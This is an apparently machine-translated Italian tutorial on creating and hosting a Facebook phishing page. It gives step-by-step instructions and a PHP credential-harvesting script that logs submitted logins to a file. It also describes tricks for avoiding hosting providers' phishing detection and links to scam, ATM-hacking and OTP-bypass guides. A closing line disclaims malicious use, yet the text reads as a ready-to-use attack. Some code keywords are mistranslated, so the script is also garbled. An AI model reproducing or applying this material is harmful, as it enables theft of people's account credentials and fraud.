Sommario
- Come creare un Facebook phishing link
- Download e salvataggio del codice sorgente
- LEZIONE 2
- Modificare il file HTML della pagina per incorporare il file PHP in esso.
- Hosting del file PHP per la memorizzazione della password
- Carica i tuoi file PHP e modifica il permesso
- Configurazione del post.Forum php
- Conclusione
Come creare un Facebook phishing link
Recentemente mi sono imbattuto in molte guide sulla creazione di pagine di phishing. Sebbene i principi alla base di ogni guida siano simili, la maggior parte delle soluzioni di hosting fornite nella guida non funziona più a causa di un aumento del giro di vite delle pagine di phishing da parte delle società di hosting. In questa guida, passerò attraverso ogni passo necessario per creare e ospitare una pagina di phishing di vostra scelta. Divertiti!
Scarica l’indice HTML della pagina Web di destinazione
Per iniziare, è necessario ottenere l’indice HTML della pagina. Ci sono vari metodi per farlo, ci sono anche modelli online per siti popolari. In questo tutorial, ho intenzione di utilizzare il modo più semplice per essere il più noob-friendly possibile.
Leggi anche: come creare un sito di phishing usando kali linux
Vai alla tua pagina Web
In questo tutorial, ho intenzione di phish Facebook.
Visualizza l’origine della pagina web.
A seconda del browser, ci possono essere diversi metodi. Normalmente è fatto facendo clic destro sul sito e facendo clic su “Visualizza sorgente”. L’ho fatto sul mio browser e un Windows dovrebbe uscire simile a questo:
Sulla casella a destra è la fonte del sito web. Che porta al passaggio successivo:
Download e salvataggio del codice sorgente
Selezionare la casella e copiare e incollare tutto nella casella in un documento txt. Utilizzare Blocco note su Windows, e un semplice programma di modifica del testo se non si utilizza Windows. (Non usare programmi come Word o Pages perché è molto lento). Dopo averlo fatto, fai clic su “Salva con nome” o qualsiasi altra opzione che ti consenta di salvare quel documento. Sul blocco note dovrebbe essere simile a questo:
Cambia “Salva come tipo” in tutti i file e cambia la codifica in Unicode.
Successivamente, assegna un nome al documento ” indice.html”, ovviamente senza i segni di discorso.
Congratulazioni! Hai finito il primo passo del tutorial!
Leggi anche: Come fare Facebook truffa senza stato vietato o ottenere bloccato
LEZIONE 2
Creazione di un file PHP per la raccolta di password
Il file PHP è fondamentalmente lo strumento che raccoglie la password degli utenti in questo scenario. Ci sono diversi modi per creare questo PHP se hai qualche conoscenza di programmazione, ma se non lo fai, basta copiare il mio esempio PHP.
<?php
intestazione (‘Posizione: facebook.com’);
$handle = fopen (“log.txt”, “a”);
foreach($_POST as $variabile => $valore) {
fwrite($handle, $variabile);
fwrite($handle, “=”);
fwrite($handle, $valore);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
uscita;
?>
Come sopra, salva il file PHP come “Tutti i file” e come ” posta.PHP”. Cambia la codifica in Unicode e dovresti essere pronto a partire!
Modificare il file HTML della pagina per incorporare il file PHP in esso.
Ora, abbiamo bisogno di incorporare il nostro file PHP, per ricevere le password che gli utenti inviano.
Trova il metodo di invio della password
In primo luogo, è necessario vedere come il sito web si occupa quando l’utente invia un nome utente-password.
Per Facebook, tutto quello che devi fare è Ctrl-F e digitare “=azione” nel campo.
Ora, è necessario sostituire tutto nella parte sottolineata con “post.php”, tenga i segni di discorso. (solo un set per favore).
Ovviamente, questo metodo sarà diverso per altri siti web. Un buon metodo per trovarlo è utilizzando lo strumento Inspect Elements nella maggior parte dei browser moderni e facendo clic sul pulsante login. Trova qualcosa di simile al metodo sopra.
Leggi anche: Scopri come hackerare le carte bancomat, le macchine che utilizzano il software Wizcardo
Nota: dovrai cambiarlo più tardi quando ospiterai effettivamente il sito web.
Hosting del file PHP per la memorizzazione della password
Ora ecco la parte succosa, rendendo il tuo sito web falso online in modo che altre persone possano navigarlo.
È possibile utilizzare qualsiasi servizio di hosting gratuito per ospitare e memorizzare le password. Tuttavia, il piano di hosting deve includere qualcosa chiamato “FTP”. Per questo tutorial, userò 000webhost.
Vai al server FTP per il tuo servizio di Web hosting
Per questo passaggio, presumo che tu abbia già creato un sito web con il tuo servizio di hosting.
Per 000webhost, è sufficiente fare clic su ” File manager “e fare clic su”Carica file”. Ecco una foto del server FTP per 000webhost:
Ignora gli altri file, quelli sono solo alcune delle mie cose personali, non correlate a questo tutorial.
Carica i tuoi file PHP e modifica il permesso
Come puoi vedere, ho già caricato il mio file PHP. Ma devi solo caricarlo nella cartella principale del tuo server FTP. (Alcuni server FTP non ti permettono di caricare nella cartella principale, basta seguire le loro istruzioni particolari).
Ora è necessario modificare l’autorizzazione a “777”, che è fondamentalmente ogni singola autorizzazione. Quando viene richiesto di spuntare le caselle per le autorizzazioni, basta spuntare ogni singolo.
Ora è possibile chiudere il server FTP. Annota il tuo indirizzo web!
Leggi anche: Istruzioni passo per bypassare la verifica OTP su qualsiasi sito Web
Che ospita la pagina di Phishing reale
Per questo passaggio, è necessario utilizzare il provider di hosting esatto che uso, altrimenti si otterrà vietato.
C’è un motivo per cui non uso lo stesso provider di hosting per la mia pagina reale, e questo perché la maggior parte dei provider di hosting impiegherà una sorta di scansione per rilevare le pagine di phishing. Posso provare più servizi di hosting in passato e tutti mi hanno vietato entro 30 minuti dal caricamento del file di indice.
Configurazione del post.Forum php
Ora, prima di ospitare il sito web, ricorda il post.php / login form cosa abbiamo configurato sopra?
Devi trovare di nuovo la cosa del modulo di accesso nel tuo indice.html e sostituire il ” post.php ” con ” http://yourwebsiteforyourpostphpupload/post.php”, supponendo che tu abbia caricato nella cartella principale. Ricordarsi di aggiungere http: / / davanti al sito. Per testare questo, navigare al sito web (http://yourwebsiteforyourpostphpupload/post.php) e vedere se si reindirizza a Facebook.com, se lo fa, allora hai incollato il sito corretto. In caso contrario, ricontrolla se hai caricato il tuo file nella directory corretta.
Hosting Pagina
Navigare htmlpasta.com. Si vedrà qualcosa di simile a questo:
Quindi, è necessario copiare l’indice.file html per il tuo sito di phishing e incollarlo qui.
Ora, fare clic sul re e fare clic su Incolla, si otterrà un link per il tuo sito web.
Conclusione
Congratulazioni! Hai finito di ospitare il tuo primo sito di phishing! Passare al tuo sito e cercare di inserire alcuni dati di accesso falsi, dopo aver fatto clic sul pulsante login, si dovrebbe reindirizzare a facebook.com. Accedi al tuo server FTP che hai ospitato il tuo post.file php, e ci dovrebbe essere un nuovo documento chiamato Log.txt che viene memorizzato all’interno della stessa cartella come il tuo post.file php. Tutti i dettagli di accesso dovrebbero essere memorizzati lì.
Leggi anche: 2020 yahoo yahoo format, billing format, pdf download
Si prega di non utilizzare questo per scopi dannosi, utilizzare solo per test di penetrazione e con l’autorizzazione della vittima.